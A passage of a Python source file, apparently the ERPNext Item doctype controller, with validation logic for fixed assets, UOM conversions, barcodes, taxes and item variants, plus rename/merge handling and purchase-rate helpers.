					file_doc.make_thumbnail()

				self.thumbnail = file_doc.thumbnail_url

	def validate_fixed_asset(self):
		"""Enforce fixed-asset constraints in both directions: a fixed asset
		must be non-stock with an asset category and no ledger entries, and
		the flag can't be cleared while Asset records exist."""
		if self.is_fixed_asset:
			if self.is_stock_item:
				frappe.throw(_("Fixed Asset Item must be a non-stock item."))

			if not self.asset_category:
				frappe.throw(_("Asset Category is mandatory for Fixed Asset item"))

			if self.stock_ledger_created():
				frappe.throw(_("Cannot be a fixed asset item as Stock Ledger is created."))
		else:
			existing_assets = frappe.db.get_all("Asset", filters={"item_code": self.name, "docstatus": 1}, limit=1)
			if existing_assets:
				frappe.throw(_('"Is Fixed Asset" cannot be unchecked, as Asset record exists against the item'))

	def validate_retain_sample(self):
		"""Retaining samples requires a retention warehouse and batch tracking."""
		if not self.retain_sample:
			return
		if not frappe.db.get_single_value('Stock Settings', 'sample_retention_warehouse'):
			frappe.throw(_("Please select Sample Retention Warehouse in Stock Settings first"))
		if not self.has_batch_no:
			frappe.throw(_(" {0} Retain Sample is based on batch, please check Has Batch No to retain sample of item").format(
				self.item_code))

	def get_context(self, context):
		"""Build the website rendering context for the item page."""
		context.show_search = True
		context.search_link = '/product_search'

		# breadcrumbs from the item-group tree
		context.parents = get_parent_item_groups(self.item_group)

		self.set_variant_context(context)
		self.set_attribute_context(context)
		self.set_disabled_attributes(context)

		return context

	def set_variant_context(self, context):
		"""Load web-visible variants into the context and overlay the selected
		variant's display fields onto the template's."""
		if self.has_variants:
			context.no_cache = True

			# load variants
			# also used in set_attribute_context
			context.variants = frappe.get_all("Item",
				 filters={"variant_of": self.name, "show_variant_in_website": 1},
				 order_by="name asc")

			variant = frappe.form_dict.variant
			if not variant and context.variants:
				# the case when the item is opened for the first time from its list
				variant = context.variants[0]

			if variant:
				context.variant = frappe.get_doc("Item", variant)

				# variant values override the template's for these fields
				for fieldname in ("website_image", "web_long_description", "description",
										"website_specifications"):
					if context.variant.get(fieldname):
						value = context.variant.get(fieldname)
						if isinstance(value, list):
							# serialize child-table rows to plain dicts
							value = [d.as_dict() for d in value]

						context[fieldname] = value

		if self.slideshow:
			# prefer the selected variant's slideshow, if it has one
			if context.variant and context.variant.slideshow:
				context.update(get_slideshow(context.variant))
			else:
				context.update(get_slideshow(self))

	def set_attribute_context(self, context):
		"""Collect, per attribute, the values available across web-visible
		variants, ordered as configured for each Item Attribute."""
		if self.has_variants:
			attribute_values_available = {}
			context.attribute_values = {}
			context.selected_attributes = {}

			# load attributes
			for v in context.variants:
				v.attributes = frappe.get_all("Item Variant Attribute",
					  fields=["attribute", "attribute_value"],
					  filters={"parent": v.name})

				for attr in v.attributes:
					values = attribute_values_available.setdefault(attr.attribute, [])
					if attr.attribute_value not in values:
						values.append(attr.attribute_value)

					# remember the currently-selected variant's choices
					if v.name == context.variant.name:
						context.selected_attributes[attr.attribute] = attr.attribute_value

			# filter attributes, order based on attribute table
			for attr in self.attributes:
				values = context.attribute_values.setdefault(attr.attribute, [])

				# numeric attributes sort by numeric value ...
				if cint(frappe.db.get_value("Item Attribute", attr.attribute, "numeric_values")):
					for val in sorted(attribute_values_available.get(attr.attribute, []), key=flt):
						values.append(val)

				else:
					# ... others follow the order defined on Item Attribute Value rows
					# get list of values defined (for sequence)
					for attr_value in frappe.db.get_all("Item Attribute Value",
						fields=["attribute_value"],
						filters={"parent": attr.attribute}, order_by="idx asc"):

						if attr_value.attribute_value in attribute_values_available.get(attr.attribute, []):
							values.append(attr_value.attribute_value)

			context.variant_info = json.dumps(context.variants)

	def set_disabled_attributes(self, context):
		"""Disable selection options of attribute combinations that do not result in a variant"""
		if not self.attributes or not self.has_variants:
			return

		context.disabled_attributes = {}
		attributes = [attr.attribute for attr in self.attributes]

		def find_variant(combination):
			# True when `combination` (a partial value tuple) is a subset of
			# some variant's full attribute-value combination.
			for variant in context.variants:
				if len(variant.attributes) < len(attributes):
					continue

				# build (and memoize on the variant) its combination, placed
				# in this template's attribute order
				if "combination" not in variant:
					ref_combination = []

					for attr in variant.attributes:
						idx = attributes.index(attr.attribute)
						ref_combination.insert(idx, attr.attribute_value)

					variant["combination"] = ref_combination

				if not (set(combination) - set(variant["combination"])):
					# check if the combination is a subset of a variant combination
					# eg. [Blue, 0.5] is a possible combination if exists [Blue, Large, 0.5]
					return True

		# the first attribute is freely selectable; for each later attribute,
		# disable values that cannot complete any existing variant given the
		# currently-selected earlier attributes
		for i, attr in enumerate(self.attributes):
			if i == 0:
				continue

			combination_source = []

			# loop through previous attributes
			for prev_attr in self.attributes[:i]:
				combination_source.append([context.selected_attributes.get(prev_attr.attribute)])

			combination_source.append(context.attribute_values[attr.attribute])

			for combination in itertools.product(*combination_source):
				if not find_variant(combination):
					context.disabled_attributes.setdefault(attr.attribute, []).append(combination[-1])

	def add_default_uom_in_conversion_factor_table(self):
		"""Ensure the stock UOM has a row (factor 1) in the UOM conversion
		table, and drop any *other* UOM row whose factor is 1.

		Fix: the removal pass used a list comprehension purely for its side
		effect (`[self.remove(d) for ...]`); replaced with a plain loop.
		"""
		uom_conv_list = [d.uom for d in self.get("uoms")]
		if self.stock_uom not in uom_conv_list:
			ch = self.append('uoms', {})
			ch.uom = self.stock_uom
			ch.conversion_factor = 1

		# collect first, then remove, to avoid mutating the table mid-iteration
		to_remove = [d for d in self.get("uoms")
			if d.conversion_factor == 1 and d.uom != self.stock_uom]
		for row in to_remove:
			self.remove(row)

	def update_template_tables(self):
		"""Copy item taxes (always) and reorder levels (only when empty)
		from this variant's template item."""
		template = frappe.get_doc("Item", self.variant_of)

		# item taxes always come from the template
		for tax in template.get("taxes"):
			self.append("taxes", {"tax_type": tax.tax_type, "tax_rate": tax.tax_rate})

		# copy re-order table only when this item has none of its own
		if not self.get("reorder_levels"):
			copied_fields = ("warehouse", "warehouse_reorder_level",
				"warehouse_reorder_qty", "material_request_type")
			for level in template.get("reorder_levels"):
				self.append("reorder_levels", {k: level.get(k) for k in copied_fields})

	def validate_conversion_factor(self):
		"""Reject duplicate UOM rows; the stock UOM's factor must be exactly 1."""
		seen_uoms = set()
		for row in self.get('uoms'):
			uom_name = cstr(row.uom)
			if uom_name in seen_uoms:
				frappe.throw(
					_("Unit of Measure {0} has been entered more than once in Conversion Factor Table").format(row.uom))
			seen_uoms.add(uom_name)

			if row.uom and uom_name == cstr(self.stock_uom) and flt(row.conversion_factor) != 1:
				frappe.throw(
					_("Conversion factor for default Unit of Measure must be 1 in row {0}").format(row.idx))

	def validate_item_type(self):
		"""Serial numbers require a stock item (or fixed asset); clear the
		serial series when serial tracking is off."""
		serial_on_non_stock = (self.has_serial_no == 1
			and self.is_stock_item == 0 and not self.is_fixed_asset)
		if serial_on_non_stock:
			msgprint(_("'Has Serial No' can not be 'Yes' for non-stock item"), raise_exception=1)

		if self.has_serial_no == 0 and self.serial_no_series:
			self.serial_no_series = None

	def check_for_active_boms(self):
		"""The default BOM must belong to this item or to its template."""
		if not self.default_bom:
			return
		bom_item = frappe.db.get_value("BOM", self.default_bom, "item")
		if bom_item not in (self.name, self.variant_of):
			frappe.throw(
				_("Default BOM ({0}) must be active for this item or its template").format(bom_item))

	def fill_customer_code(self):
		""" Append all the customer codes and insert into "customer_code" field of item table """
		self.customer_code = ','.join(
			row.ref_code for row in self.get('customer_items'))

	def check_item_tax(self):
		"""Check whether Tax Rate is not entered twice for same Tax Type"""
		seen_tax_types = set()
		chargeable_types = ('Tax', 'Chargeable', 'Income Account', 'Expense Account')
		for row in self.get('taxes'):
			if not row.tax_type:
				continue
			account_type = frappe.db.get_value("Account", row.tax_type, "account_type")

			if account_type not in chargeable_types:
				frappe.throw(
					_("Item Tax Row {0} must have account of type Tax or Income or Expense or Chargeable").format(row.idx))
			if row.tax_type in seen_tax_types:
				frappe.throw(_("{0} entered twice in Item Tax").format(row.tax_type))
			seen_tax_types.add(row.tax_type)

	def validate_barcode(self):
		"""Validate barcode rows: cross-item uniqueness, allowed barcode type,
		and EAN/UPC check-digit validity.

		Raises frappe.DuplicateEntryError when another item already uses the
		barcode, and InvalidBarcode when the check digit fails.
		Fix: the allowed-type options were fetched from meta once per row
		(loop-invariant); now fetched once. `len(x) > 0` -> truthiness.
		"""
		from stdnum import ean
		if self.barcodes:
			# allowed barcode types are the same for every row; fetch once
			options = frappe.get_meta("Item Barcode").get_options("barcode_type").split('\n')
			for item_barcode in self.barcodes:
				if item_barcode.barcode:
					duplicate = frappe.db.sql(
						"""select parent from `tabItem Barcode` where barcode = %s and parent != %s""", (item_barcode.barcode, self.name))
					if duplicate:
						frappe.throw(_("Barcode {0} already used in Item {1}").format(
							item_barcode.barcode, duplicate[0][0]), frappe.DuplicateEntryError)

					# unknown types are blanked rather than rejected
					item_barcode.barcode_type = "" if item_barcode.barcode_type not in options else item_barcode.barcode_type
					if item_barcode.barcode_type and item_barcode.barcode_type.upper() in ('EAN', 'UPC-A', 'EAN-13', 'EAN-8'):
						if not ean.is_valid(item_barcode.barcode):
							frappe.throw(_("Barcode {0} is not a valid {1} code").format(
								item_barcode.barcode, item_barcode.barcode_type), InvalidBarcode)

	def validate_warehouse_for_reorder(self):
		'''Validate Reorder level table for duplicate and conditional mandatory'''
		seen_warehouses = []
		for row in self.get("reorder_levels"):
			# default the group to the row's own warehouse
			if not row.warehouse_group:
				row.warehouse_group = row.warehouse

			row_warehouse = row.get("warehouse")
			if row_warehouse and row_warehouse not in seen_warehouses:
				seen_warehouses.append(row_warehouse)
			else:
				frappe.throw(_("Row {0}: An Reorder entry already exists for this warehouse {1}")
									.format(row.idx, row.warehouse), DuplicateReorderRows)

			if row.warehouse_reorder_level and not row.warehouse_reorder_qty:
				frappe.throw(_("Row #{0}: Please set reorder quantity").format(row.idx))

	def stock_ledger_created(self):
		# Cached probe: does at least one Stock Ledger Entry exist for this
		# item? (`limit 1` keeps the query cheap; result length is 0 or 1.)
		if not hasattr(self, '_stock_ledger_created'):
			self._stock_ledger_created = len(frappe.db.sql("""select name from `tabStock Ledger Entry`
				where item_code = %s limit 1""", self.name))
		return self._stock_ledger_created

	def validate_name_with_item_group(self):
		"""Item names may not collide with Item Group names (breaks tree build)."""
		if not frappe.db.exists("Item Group", self.name):
			return
		frappe.throw(
			_("An Item Group exists with same name, please change the item name or rename the item group"))

	def update_item_price(self):
		# Keep the denormalized name/description/brand copies on Item Price in sync.
		frappe.db.sql("""update `tabItem Price` set item_name=%s,
			item_description=%s, brand=%s where item_code=%s""",
					(self.item_name, self.description, self.brand, self.name))

	def on_trash(self):
		# Remove dependent rows (bins, prices) and delete all variants along
		# with the template item.
		super(Item, self).on_trash()
		frappe.db.sql("""delete from tabBin where item_code=%s""", self.name)
		frappe.db.sql("delete from `tabItem Price` where item_code=%s", self.name)
		for variant_of in frappe.get_all("Item", filters={"variant_of": self.name}):
			frappe.delete_doc("Item", variant_of.name)

	def before_rename(self, old_name, new_name, merge=False):
		# Keep item_name in sync when it mirrored the old item code.
		if self.item_name == old_name:
			frappe.db.set_value("Item", old_name, "item_name", new_name)

		if merge:
			# Validate properties before merging
			if not frappe.db.exists("Item", new_name):
				frappe.throw(_("Item {0} does not exist").format(new_name))

			# merging is only safe when the core stock settings agree
			field_list = ["stock_uom", "is_stock_item", "has_serial_no", "has_batch_no"]
			new_properties = [cstr(d) for d in frappe.db.get_value("Item", new_name, field_list)]
			if new_properties != [cstr(self.get(fld)) for fld in field_list]:
				frappe.throw(_("To merge, following properties must be same for both items")
									+ ": \n" + ", ".join([self.meta.get_label(fld) for fld in field_list]))

	def after_rename(self, old_name, new_name, merge):
		# Clear website caches for the previous route.
		if self.route:
			invalidate_cache_for_item(self)
			clear_cache(self.route)

		# item_code always mirrors the document name
		frappe.db.set_value("Item", new_name, "item_code", new_name)

		if merge:
			self.set_last_purchase_rate(new_name)
			self.recalculate_bin_qty(new_name)

		# Re-key the per-item tax breakup JSON stored on tax-charge rows.
		for dt in ("Sales Taxes and Charges", "Purchase Taxes and Charges"):
			for d in frappe.db.sql("""select name, item_wise_tax_detail from `tab{0}`
					where ifnull(item_wise_tax_detail, '') != ''""".format(dt), as_dict=1):

				item_wise_tax_detail = json.loads(d.item_wise_tax_detail)
				if isinstance(item_wise_tax_detail, dict) and old_name in item_wise_tax_detail:
					item_wise_tax_detail[new_name] = item_wise_tax_detail[old_name]
					item_wise_tax_detail.pop(old_name)

					frappe.db.set_value(dt, d.name, "item_wise_tax_detail",
											json.dumps(item_wise_tax_detail), update_modified=False)

	def set_last_purchase_rate(self, new_name):
		"""Refresh last_purchase_rate from the latest purchase of the (merged) item."""
		rate = get_last_purchase_details(new_name).get("base_rate", 0)
		frappe.db.set_value("Item", new_name, "last_purchase_rate", rate)

	def recalculate_bin_qty(self, new_name):
		"""Rebuild bin quantities for the merged item by reposting stock in
		every warehouse that previously had a bin."""
		from erpnext.stock.stock_balance import repost_stock
		frappe.db.auto_commit_on_many_writes = 1
		# temporarily allow negative stock so intermediate repost states pass
		existing_allow_negative_stock = frappe.db.get_value("Stock Settings", None, "allow_negative_stock")
		frappe.db.set_value("Stock Settings", None, "allow_negative_stock", 1)

		repost_stock_for_warehouses = frappe.db.sql_list("""select distinct warehouse
			from tabBin where item_code=%s""", new_name)

		# Delete all existing bins to avoid duplicate bins for the same item and warehouse
		frappe.db.sql("delete from `tabBin` where item_code=%s", new_name)

		for warehouse in repost_stock_for_warehouses:
			repost_stock(new_name, warehouse)

		# restore the previous settings
		frappe.db.set_value("Stock Settings", None, "allow_negative_stock", existing_allow_negative_stock)
		frappe.db.auto_commit_on_many_writes = 0

	def copy_specification_from_item_group(self):
		"""Rebuild website_specifications from the Item Group's specification rows."""
		self.set("website_specifications", [])
		if not self.item_group:
			return
		group_specs = frappe.db.get_values("Item Website Specification",
									   {"parent": self.item_group}, ["label", "description"])
		for label, description in group_specs:
			row = self.append("website_specifications")
			row.label = label
			row.description = description

	def update_bom_item_desc(self):
		# Propagate a changed description into all BOM tables referencing
		# this item; docstatus < 2 covers draft and submitted, not cancelled.
		if self.is_new():
			return

		if self.db_get('description') != self.description:
			frappe.db.sql("""
				update `tabBOM`
				set description = %s
				where item = %s and docstatus < 2
			""", (self.description, self.name))

			frappe.db.sql("""
				update `tabBOM Item`
				set description = %s
				where item_code = %s and docstatus < 2
			""", (self.description, self.name))

			frappe.db.sql("""
				update `tabBOM Explosion Item`
				set description = %s
				where item_code = %s and docstatus < 2
			""", (self.description, self.name))

	def update_template_item(self):
		"""Set Show in Website for Template Item if True for its Variant"""
		if self.variant_of:
			# variants are shown through the template page, not standalone
			if self.show_in_website:
				self.show_variant_in_website = 1
				self.show_in_website = 0

			if self.show_variant_in_website:
				# show template
				template_item = frappe.get_doc("Item", self.variant_of)

				if not template_item.show_in_website:
					template_item.show_in_website = 1
					# avoid cascading back into the variants on template save
					template_item.flags.dont_update_variants = True
					template_item.flags.ignore_permissions = True
					template_item.save()

	def validate_item_defaults(self):
		"""At most one Item Default row is allowed per company."""
		distinct_companies = {row.company for row in self.item_defaults}
		if len(distinct_companies) != len(self.item_defaults):
			frappe.throw(_("Cannot set multiple Item Defaults for a company."))

	def update_defaults_from_item_group(self):
		"""Get defaults from Item Group"""
		# Only when the item has no defaults of its own.
		if self.item_group and not self.item_defaults:
			item_defaults = frappe.db.get_values("Item Default", {"parent": self.item_group},
				['company', 'default_warehouse','default_price_list','buying_cost_center','default_supplier',
				'expense_account','selling_cost_center','income_account'], as_dict = 1)
			if item_defaults:
				# copy every Item Default row from the group
				for item in item_defaults:
					self.append('item_defaults', {
						'company': item.company,
						'default_warehouse': item.default_warehouse,
						'default_price_list': item.default_price_list,
						'buying_cost_center': item.buying_cost_center,
						'default_supplier': item.default_supplier,
						'expense_account': item.expense_account,
						'selling_cost_center': item.selling_cost_center,
						'income_account': item.income_account
					})
			else:
				# fall back to the session/system defaults
				warehouse = ''
				defaults = frappe.defaults.get_defaults() or {}

				# To check default warehouse is belong to the default company
				if defaults.get("default_warehouse") and frappe.db.exists("Warehouse",
					{'name': defaults.default_warehouse, 'company': defaults.company}):
					warehouse = defaults.default_warehouse

				self.append("item_defaults", {
					"company": defaults.get("company"),
					"default_warehouse": warehouse
				})

	def update_variants(self):
		"""Propagate template changes to variants: inline for up to 30
		variants, via a background job beyond that."""
		if self.flags.dont_update_variants or \
						frappe.db.get_single_value('Item Variant Settings', 'do_not_update_variants'):
			return
		if self.has_variants:
			variants = frappe.db.get_all("Item", fields=["item_code"], filters={"variant_of": self.name})
			if variants:
				if len(variants) <= 30:
					# small fan-out: update synchronously
					update_variants(variants, self, publish_progress=False)
					frappe.msgprint(_("Item Variants updated"))
				else:
					# large fan-out: defer to the queue
					frappe.enqueue("erpnext.stock.doctype.item.item.update_variants",
						variants=variants, template=self, now=frappe.flags.in_test, timeout=600)

	def validate_has_variants(self):
		"""Block clearing `has_variants` while variant items still exist."""
		if self.has_variants:
			return
		if not frappe.db.get_value("Item", self.name, "has_variants"):
			return
		if frappe.db.exists("Item", {"variant_of": self.name}):
			frappe.throw(_("Item has variants."))

	def validate_stock_exists_for_template_item(self):
		"""Freeze variant linkage (has_variants / variant_of / attributes)
		once stock ledger entries exist for the item.

		Fix: dropped a no-op `.format(self.name)` on a message that contains
		no placeholder.
		"""
		if self.stock_ledger_created() and self._doc_before_save:
			if (cint(self._doc_before_save.has_variants) != cint(self.has_variants)
				or self._doc_before_save.variant_of != self.variant_of):
				frappe.throw(_("Cannot change Variant properties after stock transaction. You will have to make a new Item to do this."),
					StockExistsForTemplate)

			if self.has_variants or self.variant_of:
				if not self.is_child_table_same('attributes'):
					frappe.throw(
						_('Cannot change Attributes after stock transaction. Make a new Item and transfer stock to the new Item'))

	def validate_variant_based_on_change(self):
		"""`variant_based_on` is immutable once variants (or a template link) exist."""
		if self.is_new():
			return
		linked_to_variants = self.variant_of or (
			self.has_variants and frappe.get_all("Item", {"variant_of": self.name}))
		if linked_to_variants:
			if self.variant_based_on != frappe.db.get_value("Item", self.name, "variant_based_on"):
				frappe.throw(_("Variant Based On cannot be changed"))

	def validate_uom(self):
		"""Guard stock-UOM changes against existing bins/ledger entries and
		keep variants on their template's stock UOM."""
		if not self.get("__islocal"):
			check_stock_uom_with_bin(self.name, self.stock_uom)
		if self.has_variants:
			# every variant must pass the same check against the new UOM
			for d in frappe.db.get_all("Item", filters={"variant_of": self.name}):
				check_stock_uom_with_bin(d.name, self.stock_uom)
		if self.variant_of:
			template_uom = frappe.db.get_value("Item", self.variant_of, "stock_uom")
			if template_uom != self.stock_uom:
				frappe.throw(_("Default Unit of Measure for Variant '{0}' must be same as in Template '{1}'")
									.format(self.stock_uom, template_uom))

	def validate_uom_conversion_factor(self):
		"""Overwrite row factors with the globally-defined UOM conversion, when one exists."""
		for row in (self.uoms or []):
			global_factor = get_uom_conv_factor(row.uom, self.stock_uom)
			if global_factor:
				row.conversion_factor = global_factor

	def validate_attributes(self):
		"""For template/variant items, require a non-empty, duplicate-free
		attributes table (when variants are attribute-based).

		Fix: `.format()` was applied *inside* `_()`, so the already-formatted
		string (not the "{0}" template) was looked up in the translation
		catalog and could never match; moved the call outside.
		"""
		if not (self.has_variants or self.variant_of):
			return

		if not self.variant_based_on:
			self.variant_based_on = 'Item Attribute'

		if self.variant_based_on == 'Item Attribute':
			attributes = []
			if not self.attributes:
				frappe.throw(_("Attribute table is mandatory"))
			for d in self.attributes:
				if d.attribute in attributes:
					frappe.throw(
						_("Attribute {0} selected multiple times in Attributes Table").format(d.attribute))
				else:
					attributes.append(d.attribute)

	def validate_variant_attributes(self):
		"""On a new variant, require a value for every attribute and reject
		the save when another variant already has this exact combination."""
		if self.is_new() and self.variant_of and self.variant_based_on == 'Item Attribute':
			args = {}
			for d in self.attributes:
				if cstr(d.attribute_value).strip() == '':
					frappe.throw(_("Please specify Attribute Value for attribute {0}").format(d.attribute))
				args[d.attribute] = d.attribute_value

			# an existing variant with identical attribute values is a duplicate
			variant = get_variant(self.variant_of, args, self.name)
			if variant:
				frappe.throw(_("Item variant {0} exists with same attributes")
					.format(variant), ItemVariantExistsError)

			validate_item_variant_attributes(self, args)

	def validate_stock_for_has_batch_and_has_serial(self):
		"""has_batch_no / has_serial_no are frozen once stock ledger entries exist.

		Fix: `.format()` was applied inside `_()`, so the pre-formatted string
		(not the "{0}/{1}" template) was used as the translation-catalog key;
		moved the call outside.
		"""
		if self.stock_ledger_created():
			for value in ["has_batch_no", "has_serial_no"]:
				if frappe.db.get_value("Item", self.name, value) != self.get_value(value):
					frappe.throw(_("Cannot change {0} as Stock Transaction for Item {1} exist.").format(value, self.name))

def get_timeline_data(doctype, name):
	'''returns timeline data based on stock ledger entry'''
	daily_counts = dict(frappe.db.sql('''select posting_date, count(*)
		from `tabStock Ledger Entry` where item_code=%s
			and posting_date > date_sub(curdate(), interval 1 year)
			group by posting_date''', name))

	# keyed by timestamp instead of date for the timeline widget
	return {get_timestamp(posting_date): count
		for posting_date, count in iteritems(daily_counts)}


def validate_end_of_life(item_code, end_of_life=None, disabled=None, verbose=1):
	"""Warn (or raise, per *verbose*) when the item is past end-of-life or disabled."""
	if (not end_of_life) or (disabled is None):
		end_of_life, disabled = frappe.db.get_value("Item", item_code, ["end_of_life", "disabled"])

	reached_eol = (end_of_life and end_of_life != "0000-00-00"
		and getdate(end_of_life) <= now_datetime().date())
	if reached_eol:
		_msgprint(_("Item {0} has reached its end of life on {1}").format(
			item_code, formatdate(end_of_life)), verbose)

	if disabled:
		_msgprint(_("Item {0} is disabled").format(item_code), verbose)


def validate_is_stock_item(item_code, is_stock_item=None, verbose=1):
	"""Warn (or raise, per *verbose*) when the given item is not a stock item."""
	if not is_stock_item:
		is_stock_item = frappe.db.get_value("Item", item_code, "is_stock_item")

	if is_stock_item != 1:
		_msgprint(_("Item {0} is not a stock Item").format(item_code), verbose)


def validate_cancelled_item(item_code, docstatus=None, verbose=1):
	"""Warn (or raise, per *verbose*) when the item document is cancelled (docstatus 2)."""
	if docstatus is None:
		docstatus = frappe.db.get_value("Item", item_code, "docstatus")

	if docstatus == 2:
		_msgprint(_("Item {0} is cancelled").format(item_code), verbose)


def _msgprint(msg, verbose):
	"""Surface *msg* to the user (verbose) or raise it as a plain ValidationError."""
	if not verbose:
		raise frappe.ValidationError(msg)
	msgprint(msg, raise_exception=True)


def get_last_purchase_details(item_code, doc_name=None, conversion_rate=1.0):
	"""returns last purchase details in stock uom

	Looks at the latest submitted Purchase Order and Purchase Receipt for
	`item_code` (excluding `doc_name`), picks whichever is more recent, and
	returns its rates normalized by the row's conversion factor, plus
	`price_list_rate`/`rate` converted by `conversion_rate`.
	Returns an empty frappe._dict when neither document exists.
	"""
	# get last purchase order item details
	last_purchase_order = frappe.db.sql("""\
		select po.name, po.transaction_date, po.conversion_rate,
			po_item.conversion_factor, po_item.base_price_list_rate,
			po_item.discount_percentage, po_item.base_rate
		from `tabPurchase Order` po, `tabPurchase Order Item` po_item
		where po.docstatus = 1 and po_item.item_code = %s and po.name != %s and
			po.name = po_item.parent
		order by po.transaction_date desc, po.name desc
		limit 1""", (item_code, cstr(doc_name)), as_dict=1)

	# get last purchase receipt item details
	last_purchase_receipt = frappe.db.sql("""\
		select pr.name, pr.posting_date, pr.posting_time, pr.conversion_rate,
			pr_item.conversion_factor, pr_item.base_price_list_rate, pr_item.discount_percentage,
			pr_item.base_rate
		from `tabPurchase Receipt` pr, `tabPurchase Receipt Item` pr_item
		where pr.docstatus = 1 and pr_item.item_code = %s and pr.name != %s and
			pr.name = pr_item.parent
		order by pr.posting_date desc, pr.posting_time desc, pr.name desc
		limit 1""", (item_code, cstr(doc_name)), as_dict=1)

	# "1900-01-01" stands in for "never purchased" on either side
	purchase_order_date = getdate(last_purchase_order and last_purchase_order[0].transaction_date
							   or "1900-01-01")
	purchase_receipt_date = getdate(last_purchase_receipt and
								 last_purchase_receipt[0].posting_date or "1900-01-01")

	if (purchase_order_date > purchase_receipt_date) or \
				(last_purchase_order and not last_purchase_receipt):
		# use purchase order
		last_purchase = last_purchase_order[0]
		purchase_date = purchase_order_date

	elif (purchase_receipt_date > purchase_order_date) or \
				(last_purchase_receipt and not last_purchase_order):
		# use purchase receipt
		last_purchase = last_purchase_receipt[0]
		purchase_date = purchase_receipt_date

	else:
		# dates are equal (including the neither-found case): no usable record
		return frappe._dict()

	# normalize document-UOM rates into stock UOM
	conversion_factor = flt(last_purchase.conversion_factor)
	out = frappe._dict({
		"base_price_list_rate": flt(last_purchase.base_price_list_rate) / conversion_factor,
		"base_rate": flt(last_purchase.base_rate) / conversion_factor,
		"discount_percentage": flt(last_purchase.discount_percentage),
		"purchase_date": purchase_date
	})

	# convert company-currency rates by the requested conversion rate
	conversion_rate = flt(conversion_rate) or 1.0
	out.update({
		"price_list_rate": out.base_price_list_rate / conversion_rate,
		"rate": out.base_rate / conversion_rate,
		"base_rate": out.base_rate
	})

	return out


def invalidate_cache_for_item(doc):
	"""Invalidate website cache entries affected by a change to an Item.

	Clears the cache for the item's current item group, for every website
	item group (both the previously saved ones and those currently on the
	document), and for the previous item group if it was changed.
	"""
	invalidate_cache_for(doc, doc.item_group)

	# Union of old and current website item groups, skipping empty values.
	groups = set(doc.get("old_website_item_groups") or [])
	for row in doc.get({"doctype": "Website Item Group"}):
		if row.item_group:
			groups.add(row.item_group)

	for group in groups:
		invalidate_cache_for(doc, group)

	# The item was moved to another item group: refresh the old one as well.
	old_group = doc.get("old_item_group")
	if old_group and old_group != doc.item_group:
		invalidate_cache_for(doc, old_group)


def check_stock_uom_with_bin(item, stock_uom):
	"""Validate that the Item's default UOM can be changed to ``stock_uom``.

	A change is rejected when stock ledger entries exist in a different UOM,
	or when any Bin with pending quantities uses a different UOM. Bins with
	no pending quantities are silently migrated to the new UOM.
	"""
	if stock_uom == frappe.db.get_value("Item", item, "stock_uom"):
		# Nothing is changing.
		return

	matched = True
	ref_uom = frappe.db.get_value("Stock Ledger Entry",
							   {"item_code": item}, "stock_uom")

	if ref_uom:
		# Existing stock ledger entries pin the UOM: it must match.
		matched = cstr(ref_uom) == cstr(stock_uom)
	else:
		bin_list = frappe.db.sql("select * from tabBin where item_code=%s", item, as_dict=1)
		for bin_row in bin_list:
			has_pending_qty = (bin_row.reserved_qty > 0 or bin_row.ordered_qty > 0
				or bin_row.indented_qty > 0 or bin_row.planned_qty > 0)
			if has_pending_qty and cstr(bin_row.stock_uom) != cstr(stock_uom):
				matched = False
				break

		if matched and bin_list:
			# No conflicting quantities: safe to migrate all bins.
			frappe.db.sql("""update tabBin set stock_uom=%s where item_code=%s""", (stock_uom, item))

	if not matched:
		frappe.throw(
			_("Default Unit of Measure for Item {0} cannot be changed directly because you have already made some transaction(s) with another UOM. You will need to create a new Item to use a different Default UOM.").format(item))

def get_item_defaults(item_code, company):
	"""Return the Item as a dict, overlaid with company-specific defaults.

	Values from the ``item_defaults`` child row matching ``company`` replace
	the corresponding top-level item values; the child row's ``name`` is
	dropped so it cannot clobber the item name.
	"""
	item = frappe.get_cached_doc('Item', item_code)
	defaults = item.as_dict()

	for default_row in item.item_defaults:
		if default_row.company != company:
			continue
		row_values = copy.deepcopy(default_row.as_dict())
		del row_values["name"]
		defaults.update(row_values)

	return defaults

def set_item_default(item_code, company, fieldname, value):
	"""Set a company-level default on an Item without overwriting existing data.

	If an ``item_defaults`` row for ``company`` exists, the field is written
	only when it is currently empty. Otherwise a new row is inserted for the
	company and the item's cache is cleared.
	"""
	item = frappe.get_cached_doc('Item', item_code)

	for default_row in item.item_defaults:
		if default_row.company != company:
			continue
		# Do not clobber a value that is already set.
		if not default_row.get(fieldname):
			frappe.db.set_value(default_row.doctype, default_row.name, fieldname, value)
		return

	# No row for this company yet: append one and persist it directly.
	new_row = item.append('item_defaults', {fieldname: value, "company": company})
	new_row.db_insert()
	item.clear_cache()

@frappe.whitelist()
def get_uom_conv_factor(uom, stock_uom):
	"""Return the conversion factor from ``uom`` to ``stock_uom``.

	First looks for a direct UOM Conversion Factor record in either
	direction; if none is found, tries to derive the factor through a common
	base UOM. Returns ``""`` when no factor can be determined.
	"""
	uoms = [uom, stock_uom]
	value = ""
	uom_details = frappe.db.sql("""select to_uom, from_uom, value from `tabUOM Conversion Factor`\
		where to_uom in ({0})
		""".format(', '.join(['"' + frappe.db.escape(i, percent=False) + '"' for i in uoms])), as_dict=True)

	for d in uom_details:
		if d.from_uom == stock_uom and d.to_uom == uom:
			# Inverse record: guard against a zero factor from bad master
			# data, which previously raised ZeroDivisionError.
			if flt(d.value):
				value = 1 / flt(d.value)
		elif d.from_uom == uom and d.to_uom == stock_uom:
			value = d.value

	if not value:
		# No direct record: derive the factor when both UOMs convert from
		# the same base UOM (guarding the divisor as above).
		uom_stock = frappe.db.get_value("UOM Conversion Factor", {"to_uom": stock_uom}, ["from_uom", "value"], as_dict=1)
		uom_row = frappe.db.get_value("UOM Conversion Factor", {"to_uom": uom}, ["from_uom", "value"], as_dict=1)

		if uom_stock and uom_row:
			if uom_stock.from_uom == uom_row.from_uom and flt(uom_row.value):
				value = flt(uom_stock.value) / flt(uom_row.value)

	return value

@frappe.whitelist()
def get_item_attribute(parent, attribute_value=''):
	"""Return attribute values of an Item Attribute matching a search string.

	Performs a LIKE search on ``attribute_value``; intended as a whitelisted
	autocomplete data source.
	"""
	if not frappe.has_permission("Item"):
		frappe.msgprint(_("No Permission"), raise_exception=1)

	filters = {
		'parent': parent,
		'attribute_value': ("like", "%%%s%%" % attribute_value),
	}
	return frappe.get_all("Item Attribute Value", fields=["attribute_value"], filters=filters)

def update_variants(variants, template, publish_progress=True):
	"""Copy the template's attributes onto each variant Item and save it.

	Optionally publishes a progress percentage after each variant is saved.
	"""
	total = len(variants)
	for done, variant_name in enumerate(variants, start=1):
